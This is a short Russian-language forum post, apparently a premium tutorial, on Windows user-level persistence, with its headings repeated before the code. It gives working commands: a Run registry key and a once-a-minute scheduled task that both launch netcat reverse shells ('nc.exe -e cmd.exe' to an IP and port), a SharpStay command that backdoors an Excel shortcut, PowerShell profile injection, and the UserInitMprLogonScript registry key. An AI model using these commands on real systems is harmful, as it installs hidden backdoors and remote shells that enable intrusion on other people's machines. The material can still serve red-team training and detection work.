devqp
Премиум
Реестр и папка автозагрузки
Классический метод создания персистенции через автозагрузку реестра или размещение файла в стартовой папке. Пример добавления в реестр:
Путь к папке автозагрузки:
Планировщик задач
Создание задачи для регулярного выполнения кода:
Инструмент ScheduleRunner для автоматизации:
Ядовитые ярлыки (.lnk)
Модификация целевого пути в ярлыках с использованием SharpStay:
Профиль PowerShell
Добавление скрипта в профиль пользователя:
UserInitMprLogonScript
Установка пути к скрипту в реестре:
Все примеры требуют прав пользовательского уровня. Для COM Hijacking и других методов потребуются привилегии администратора — тема следующего материала.
Классический метод создания персистенции через автозагрузку реестра или размещение файла в стартовой папке. Пример добавления в реестр:
Код:
REG ADD HKCU\SOFTWARE\Microsoft\CurrentVersion\Run /v 1 /d "C:\Users\guest\Downloads\nc.exe -e cmd.exe IP PORT"
Путь к папке автозагрузки:
Код:
C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Планировщик задач
Создание задачи для регулярного выполнения кода:
Код:
schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr 'c:\Users\User\Downloads/nc.exe 192.168.56.103 1337 -e cmd.exe'
Код:
ScheduleRunner.exe /method:create /taskname:Cleanup /trigger:daily /starttime:23:30 /program:calc.exe
Ядовитые ярлыки (.lnk)
Модификация целевого пути в ярлыках с использованием SharpStay:
Код:
Sharpstay.exe action=BackdoorLNK command="C:\Windows\temp\fun.exe" lnkpath="C:\users\user\desktop\Excel.lnk"
Профиль PowerShell
Добавление скрипта в профиль пользователя:
Код:
echo "whoami > c:\temp\whoami.txt" > $PROFILE
UserInitMprLogonScript
Установка пути к скрипту в реестре:
Код:
HKCU\Environment\UserInitMprLogonScript → путь_к_скрипту
Все примеры требуют прав пользовательского уровня. Для COM Hijacking и других методов потребуются привилегии администратора — тема следующего материала.